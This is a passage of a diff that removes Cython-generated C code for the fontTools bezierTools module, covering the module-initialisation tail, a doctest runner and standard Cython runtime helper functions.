__PYX_ERR(0, 1472, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_doctest, __pyx_t_3) < 0) __PYX_ERR(0, 1472, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1474 - * import doctest - * - * sys.exit(doctest.testmod().failed) # <<<<<<<<<<<<<< - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sys); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_exit); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_doctest); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_testmod); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_CallNoArg(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_failed); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_CallOneArg(__pyx_t_2, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1470 - * - * - * if __name__ == "__main__": # <<<<<<<<<<<<<< - * import sys - * import doctest - */ - } - - /* "fontTools/misc/bezierTools.py":1 - * # -*- coding: utf-8 -*- # <<<<<<<<<<<<<< - * """fontTools.misc.bezierTools.py -- tools for working with Bezier path segments. - * """ - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(15); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcQuadraticArcLength_line_151, __pyx_kp_u_Calculates_the_arc_length_for_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcQuadraticBounds_line_298, __pyx_kp_u_Calculates_the_bounding_rectangl) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_approximateCubicArcLength_line_3, __pyx_kp_u_Approximates_the_arc_length_for) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcCubicBounds_line_412, __pyx_kp_u_Calculates_the_bounding_rectangl_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitLine_line_450, __pyx_kp_u_Split_a_line_at_a_given_coordina) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitQuadratic_line_507, __pyx_kp_u_Split_a_quadratic_Bezier_curve_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitCubic_line_552, __pyx_kp_u_Split_a_cubic_Bezier_curve_at_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitQuadraticAtT_line_589, __pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitCubicAtT_line_613, __pyx_kp_u_Split_a_cubic_Bezier_curve_at_on) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_solveCubic_line_841, __pyx_kp_u_Solve_a_cubic_equation_Solves_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_lineLineIntersections_line_1147, __pyx_kp_u_Finds_intersections_between_two) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_curveLineIntersections_line_1248, __pyx_kp_u_Finds_intersections_between_a_cu) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_curveCurveIntersections_line_137, __pyx_kp_u_Finds_intersections_between_a_cu_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_segmentSegmentIntersections_line, __pyx_kp_u_Finds_intersections_between_two_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_segmentrepr_line_1449, __pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_3) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /*--- Wrapped vars code ---*/ - - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - if (__pyx_m) { - if (__pyx_d && stringtab_initialized) { - __Pyx_AddTraceback("init fontTools.misc.bezierTools", __pyx_clineno, __pyx_lineno, __pyx_filename); - } - #if !CYTHON_USE_MODULE_STATE - Py_CLEAR(__pyx_m); - #else - Py_DECREF(__pyx_m); - if (pystate_addmodule_run) { - PyObject *tp, *value, *tb; - PyErr_Fetch(&tp, &value, &tb); - PyState_RemoveModule(&__pyx_moduledef); - PyErr_Restore(tp, value, tb); - } - #endif - } else if (!PyErr_Occurred()) { - PyErr_SetString(PyExc_ImportError, "init fontTools.misc.bezierTools"); - } - __pyx_L0:; - __Pyx_RefNannyFinishContext(); - #if CYTHON_PEP489_MULTI_PHASE_INIT - return (__pyx_m != NULL) ? 0 : -1; - #elif PY_MAJOR_VERSION >= 3 - return __pyx_m; - #else - return; - #endif -} -/* #### Code section: cleanup_globals ### */ -/* #### Code section: cleanup_module ### */ -/* #### Code section: main_method ### */ -/* #### Code section: utility_code_pragmas ### */ -#ifdef _MSC_VER -#pragma warning( push ) -/* Warning 4127: conditional expression is constant - * Cython uses constant conditional expressions to allow in inline functions to be optimized at - * compile-time, so this warning is not useful - */ -#pragma warning( disable : 4127 ) -#endif - - - -/* #### Code section: utility_code_def ### */ - -/* --- Runtime support code --- */ -/* Refnanny */ -#if CYTHON_REFNANNY -static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { - PyObject *m = NULL, *p = NULL; - void *r = NULL; - m = PyImport_ImportModule(modname); - if (!m) goto end; - p = PyObject_GetAttrString(m, "RefNannyAPI"); - if (!p) goto end; - r = PyLong_AsVoidPtr(p); -end: - Py_XDECREF(p); - Py_XDECREF(m); - return (__Pyx_RefNannyAPIStruct *)r; -} -#endif - -/* PyErrExceptionMatches */ -#if CYTHON_FAST_THREAD_STATE -static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(tuple); -#if PY_MAJOR_VERSION >= 3 - for (i=0; i= 0x030C00A6 - PyObject *current_exception = tstate->current_exception; - if (unlikely(!current_exception)) return 0; - exc_type = (PyObject*) Py_TYPE(current_exception); - if (exc_type == err) return 1; -#else - exc_type = tstate->curexc_type; - if (exc_type == err) return 1; - if (unlikely(!exc_type)) return 0; -#endif - #if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(exc_type); - #endif - if (unlikely(PyTuple_Check(err))) { - result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); - } else { - result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); - } - #if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(exc_type); - #endif - return result; -} -#endif - -/* PyErrFetchRestore */ -#if CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { -#if PY_VERSION_HEX >= 0x030C00A6 - PyObject *tmp_value; - assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); - if (value) { - #if CYTHON_COMPILING_IN_CPYTHON - if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) - #endif - PyException_SetTraceback(value, tb); - } - tmp_value = tstate->current_exception; - tstate->current_exception = value; - Py_XDECREF(tmp_value); - Py_XDECREF(type); - Py_XDECREF(tb); -#else - PyObject *tmp_type, *tmp_value, *tmp_tb; - tmp_type = tstate->curexc_type; - tmp_value = tstate->curexc_value; - tmp_tb = tstate->curexc_traceback; - tstate->curexc_type = type; - tstate->curexc_value = value; - tstate->curexc_traceback = tb; - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); -#endif -} -static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { -#if PY_VERSION_HEX >= 0x030C00A6 - PyObject* exc_value; - exc_value = tstate->current_exception; - tstate->current_exception = 0; - *value = exc_value; - *type = NULL; - *tb = NULL; - if (exc_value) { - *type = (PyObject*) Py_TYPE(exc_value); - Py_INCREF(*type); - #if CYTHON_COMPILING_IN_CPYTHON - *tb = ((PyBaseExceptionObject*) exc_value)->traceback; - Py_XINCREF(*tb); - #else - *tb = PyException_GetTraceback(exc_value); - #endif - } -#else - *type = tstate->curexc_type; - *value = tstate->curexc_value; - *tb = tstate->curexc_traceback; - tstate->curexc_type = 0; - tstate->curexc_value = 0; - tstate->curexc_traceback = 0; -#endif -} -#endif - -/* PyObjectGetAttrStr */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { - PyTypeObject* tp = Py_TYPE(obj); - if (likely(tp->tp_getattro)) - return tp->tp_getattro(obj, attr_name); -#if PY_MAJOR_VERSION < 3 - if (likely(tp->tp_getattr)) - return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); -#endif - return PyObject_GetAttr(obj, attr_name); -} -#endif - -/* PyObjectGetAttrStrNoError */ -static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) - __Pyx_PyErr_Clear(); -} -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { - PyObject *result; -#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 - PyTypeObject* tp = Py_TYPE(obj); - if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { - return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); - } -#endif - result = __Pyx_PyObject_GetAttrStr(obj, attr_name); - if (unlikely(!result)) { - __Pyx_PyObject_GetAttrStr_ClearAttributeError(); - } - return result; -} - -/* GetBuiltinName */ -static PyObject *__Pyx_GetBuiltinName(PyObject *name) { - PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); - if (unlikely(!result) && !PyErr_Occurred()) { - PyErr_Format(PyExc_NameError, -#if PY_MAJOR_VERSION >= 3 - "name '%U' is not defined", name); -#else - "name '%.200s' is not defined", PyString_AS_STRING(name)); -#endif - } - return result; -} - -/* TupleAndListFromArray */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { - PyObject *v; - Py_ssize_t i; - for (i = 0; i < length; i++) { - v = dest[i] = src[i]; - Py_INCREF(v); - } -} -static CYTHON_INLINE PyObject * -__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) -{ - PyObject *res; - if (n <= 0) { - Py_INCREF(__pyx_empty_tuple); - return __pyx_empty_tuple; - } - res = PyTuple_New(n); - if (unlikely(res == NULL)) return NULL; - __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); - return res; -} -static CYTHON_INLINE PyObject * -__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) -{ - PyObject *res; - if (n <= 0) { - return PyList_New(0); - } - res = PyList_New(n); - if (unlikely(res == NULL)) return NULL; - __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); - return res; -} -#endif - -/* BytesEquals */ -static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { -#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API - return PyObject_RichCompareBool(s1, s2, equals); -#else - if (s1 == s2) { - return (equals == Py_EQ); - } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { - const char *ps1, *ps2; - Py_ssize_t length = PyBytes_GET_SIZE(s1); - if (length != PyBytes_GET_SIZE(s2)) - return (equals == Py_NE); - ps1 = PyBytes_AS_STRING(s1); - ps2 = PyBytes_AS_STRING(s2); - if (ps1[0] != ps2[0]) { - return (equals == Py_NE); - } else if (length == 1) { - return (equals == Py_EQ); - } else { - int result; -#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) - Py_hash_t hash1, hash2; - hash1 = ((PyBytesObject*)s1)->ob_shash; - hash2 = ((PyBytesObject*)s2)->ob_shash; - if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { - return (equals == Py_NE); - } -#endif - result = memcmp(ps1, ps2, (size_t)length); - return (equals == Py_EQ) ? (result == 0) : (result != 0); - } - } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { - return (equals == Py_NE); - } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { - return (equals == Py_NE); - } else { - int result; - PyObject* py_result = PyObject_RichCompare(s1, s2, equals); - if (!py_result) - return -1; - result = __Pyx_PyObject_IsTrue(py_result); - Py_DECREF(py_result); - return result; - } -#endif -} - -/* UnicodeEquals */ -static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { -#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API - return PyObject_RichCompareBool(s1, s2, equals); -#else -#if PY_MAJOR_VERSION < 3 - PyObject* owned_ref = NULL; -#endif - int s1_is_unicode, s2_is_unicode; - if (s1 == s2) { - goto return_eq; - } - s1_is_unicode = PyUnicode_CheckExact(s1); - s2_is_unicode = PyUnicode_CheckExact(s2); -#if PY_MAJOR_VERSION < 3 - if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { - owned_ref = PyUnicode_FromObject(s2); - if (unlikely(!owned_ref)) - return -1; - s2 = owned_ref; - s2_is_unicode = 1; - } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { - owned_ref = PyUnicode_FromObject(s1); - if (unlikely(!owned_ref)) - return -1; - s1 = owned_ref; - s1_is_unicode = 1; - } else if (((!s2_is_unicode) & (!s1_is_unicode))) { - return __Pyx_PyBytes_Equals(s1, s2, equals); - } -#endif - if (s1_is_unicode & s2_is_unicode) { - Py_ssize_t length; - int kind; - void *data1, *data2; - if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) - return -1; - length = __Pyx_PyUnicode_GET_LENGTH(s1); - if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { - goto return_ne; - } -#if CYTHON_USE_UNICODE_INTERNALS - { - Py_hash_t hash1, hash2; - #if CYTHON_PEP393_ENABLED - hash1 = ((PyASCIIObject*)s1)->hash; - hash2 = ((PyASCIIObject*)s2)->hash; - #else - hash1 = ((PyUnicodeObject*)s1)->hash; - hash2 = ((PyUnicodeObject*)s2)->hash; - #endif - if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { - goto return_ne; - } - } -#endif - kind = __Pyx_PyUnicode_KIND(s1); - if (kind != __Pyx_PyUnicode_KIND(s2)) { - goto return_ne; - } - data1 = __Pyx_PyUnicode_DATA(s1); - data2 = __Pyx_PyUnicode_DATA(s2); - if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { - goto return_ne; - } else if (length == 1) { - goto return_eq; - } else { - int result = memcmp(data1, data2, (size_t)(length * kind)); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_EQ) ? (result == 0) : (result != 0); - } - } else if ((s1 == Py_None) & s2_is_unicode) { - goto return_ne; - } else if ((s2 == Py_None) & s1_is_unicode) { - goto return_ne; - } else { - int result; - PyObject* py_result = PyObject_RichCompare(s1, s2, equals); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - if (!py_result) - return -1; - result = __Pyx_PyObject_IsTrue(py_result); - Py_DECREF(py_result); - return result; - } -return_eq: - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_EQ); -return_ne: - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(owned_ref); - #endif - return (equals == Py_NE); -#endif -} - -/* fastcall */ -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) -{ - Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); - for (i = 0; i < n; i++) - { - if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; - } - for (i = 0; i < n; i++) - { - int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); - if (unlikely(eq != 0)) { - if (unlikely(eq < 0)) return NULL; // error - return kwvalues[i]; - } - } - return NULL; // not found (no exception set) -} -#endif - -/* RaiseArgTupleInvalid */ -static void __Pyx_RaiseArgtupleInvalid( - const char* func_name, - int exact, - Py_ssize_t num_min, - Py_ssize_t num_max, - Py_ssize_t num_found) -{ - Py_ssize_t num_expected; - const char *more_or_less; - if (num_found < num_min) { - num_expected = num_min; - more_or_less = "at least"; - } else { - num_expected = num_max; - more_or_less = "at most"; - } - if (exact) { - more_or_less = "exactly"; - } - PyErr_Format(PyExc_TypeError, - "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", - func_name, more_or_less, num_expected, - (num_expected == 1) ? "" : "s", num_found); -} - -/* RaiseDoubleKeywords */ -static void __Pyx_RaiseDoubleKeywordsError( - const char* func_name, - PyObject* kw_name) -{ - PyErr_Format(PyExc_TypeError, - #if PY_MAJOR_VERSION >= 3 - "%s() got multiple values for keyword argument '%U'", func_name, kw_name); - #else - "%s() got multiple values for keyword argument '%s'", func_name, - PyString_AsString(kw_name)); - #endif -} - -/* ParseKeywords */ -static int __Pyx_ParseOptionalKeywords( - PyObject *kwds, - PyObject *const *kwvalues, - PyObject **argnames[], - PyObject *kwds2, - PyObject *values[], - Py_ssize_t num_pos_args, - const char* function_name) -{ - PyObject *key = 0, *value = 0; - Py_ssize_t pos = 0; - PyObject*** name; - PyObject*** first_kw_arg = argnames + num_pos_args; - int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); - while (1) { - Py_XDECREF(key); key = NULL; - Py_XDECREF(value); value = NULL; - if (kwds_is_tuple) { - Py_ssize_t size; -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(kwds); -#else - size = PyTuple_Size(kwds); - if (size < 0) goto bad; -#endif - if (pos >= size) break; -#if CYTHON_AVOID_BORROWED_REFS - key = __Pyx_PySequence_ITEM(kwds, pos); - if (!key) goto bad; -#elif CYTHON_ASSUME_SAFE_MACROS - key = PyTuple_GET_ITEM(kwds, pos); -#else - key = PyTuple_GetItem(kwds, pos); - if (!key) goto bad; -#endif - value = kwvalues[pos]; - pos++; - } - else - { - if (!PyDict_Next(kwds, &pos, &key, &value)) break; -#if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(key); -#endif - } - name = first_kw_arg; - while (*name && (**name != key)) name++; - if (*name) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - Py_INCREF(value); // transfer ownership of value to values - Py_DECREF(key); -#endif - key = NULL; - value = NULL; - continue; - } -#if !CYTHON_AVOID_BORROWED_REFS - Py_INCREF(key); -#endif - Py_INCREF(value); - name = first_kw_arg; - #if PY_MAJOR_VERSION < 3 - if (likely(PyString_Check(key))) { - while (*name) { - if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) - && _PyString_Eq(**name, key)) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - value = NULL; // ownership transferred to values -#endif - break; - } - name++; - } - if (*name) continue; - else { - PyObject*** argname = argnames; - while (argname != first_kw_arg) { - if ((**argname == key) || ( - (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) - && _PyString_Eq(**argname, key))) { - goto arg_passed_twice; - } - argname++; - } - } - } else - #endif - if (likely(PyUnicode_Check(key))) { - while (*name) { - int cmp = ( - #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 - (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : - #endif - PyUnicode_Compare(**name, key) - ); - if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; - if (cmp == 0) { - values[name-argnames] = value; -#if CYTHON_AVOID_BORROWED_REFS - value = NULL; // ownership transferred to values -#endif - break; - } - name++; - } - if (*name) continue; - else { - PyObject*** argname = argnames; - while (argname != first_kw_arg) { - int cmp = (**argname == key) ? 0 : - #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 - (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : - #endif - PyUnicode_Compare(**argname, key); - if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; - if (cmp == 0) goto arg_passed_twice; - argname++; - } - } - } else - goto invalid_keyword_type; - if (kwds2) { - if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; - } else { - goto invalid_keyword; - } - } - Py_XDECREF(key); - Py_XDECREF(value); - return 0; -arg_passed_twice: - __Pyx_RaiseDoubleKeywordsError(function_name, key); - goto bad; -invalid_keyword_type: - PyErr_Format(PyExc_TypeError, - "%.200s() keywords must be strings", function_name); - goto bad; -invalid_keyword: - #if PY_MAJOR_VERSION < 3 - PyErr_Format(PyExc_TypeError, - "%.200s() got an unexpected keyword argument '%.200s'", - function_name, PyString_AsString(key)); - #else - PyErr_Format(PyExc_TypeError, - "%s() got an unexpected keyword argument '%U'", - function_name, key); - #endif -bad: - Py_XDECREF(key); - Py_XDECREF(value); - return -1; -} - -/* PyDictVersioning */ -#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { - PyObject *dict = Py_TYPE(obj)->tp_dict; - return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; -} -static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { - PyObject **dictptr = NULL; - Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; - if (offset) { -#if CYTHON_COMPILING_IN_CPYTHON - dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); -#else - dictptr = _PyObject_GetDictPtr(obj); -#endif - } - return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; -} -static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { - PyObject *dict = Py_TYPE(obj)->tp_dict; - if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) - return 0; - return obj_dict_version == __Pyx_get_object_dict_version(obj); -} -#endif - -/* GetModuleGlobalName */ -#if CYTHON_USE_DICT_VERSIONS -static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) -#else -static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) -#endif -{ - PyObject *result; -#if !CYTHON_AVOID_BORROWED_REFS -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 - result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } else if (unlikely(PyErr_Occurred())) { - return NULL; - } -#elif CYTHON_COMPILING_IN_LIMITED_API - if (unlikely(!__pyx_m)) { - return NULL; - } - result = PyObject_GetAttr(__pyx_m, name); - if (likely(result)) { - return result; - } -#else - result = PyDict_GetItem(__pyx_d, name); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } -#endif -#else - result = PyObject_GetItem(__pyx_d, name); - __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) - if (likely(result)) { - return __Pyx_NewRef(result); - } - PyErr_Clear(); -#endif - return __Pyx_GetBuiltinName(name); -} - -/* PyObjectCall */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { - PyObject *result; - ternaryfunc call = Py_TYPE(func)->tp_call; - if (unlikely(!call)) - return PyObject_Call(func, arg, kw); - if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) - return NULL; - result = (*call)(func, arg, kw); - Py_LeaveRecursiveCall(); - if (unlikely(!result) && unlikely(!PyErr_Occurred())) { - PyErr_SetString( - PyExc_SystemError, - "NULL result without error in PyObject_Call"); - } - return result; -} -#endif - -/* PyFunctionFastCall */ -#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL -static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, - PyObject *globals) { - PyFrameObject *f; - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject **fastlocals; - Py_ssize_t i; - PyObject *result; - assert(globals != NULL); - /* XXX Perhaps we should create a specialized - PyFrame_New() that doesn't take locals, but does - take builtins without sanity checking them. - */ - assert(tstate != NULL); - f = PyFrame_New(tstate, co, globals, NULL); - if (f == NULL) { - return NULL; - } - fastlocals = __Pyx_PyFrame_GetLocalsplus(f); - for (i = 0; i < na; i++) { - Py_INCREF(*args); - fastlocals[i] = *args++; - } - result = PyEval_EvalFrameEx(f,0); - ++tstate->recursion_depth; - Py_DECREF(f); - --tstate->recursion_depth; - return result; -} -static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { - PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); - PyObject *globals = PyFunction_GET_GLOBALS(func); - PyObject *argdefs = PyFunction_GET_DEFAULTS(func); - PyObject *closure; -#if PY_MAJOR_VERSION >= 3 - PyObject *kwdefs; -#endif - PyObject *kwtuple, **k; - PyObject **d; - Py_ssize_t nd; - Py_ssize_t nk; - PyObject *result; - assert(kwargs == NULL || PyDict_Check(kwargs)); - nk = kwargs ? PyDict_Size(kwargs) : 0; - if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { - return NULL; - } - if ( -#if PY_MAJOR_VERSION >= 3 - co->co_kwonlyargcount == 0 && -#endif - likely(kwargs == NULL || nk == 0) && - co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { - if (argdefs == NULL && co->co_argcount == nargs) { - result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); - goto done; - } - else if (nargs == 0 && argdefs != NULL - && co->co_argcount == Py_SIZE(argdefs)) { - /* function called with no arguments, but all parameters have - a default value: use default values as arguments .*/ - args = &PyTuple_GET_ITEM(argdefs, 0); - result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); - goto 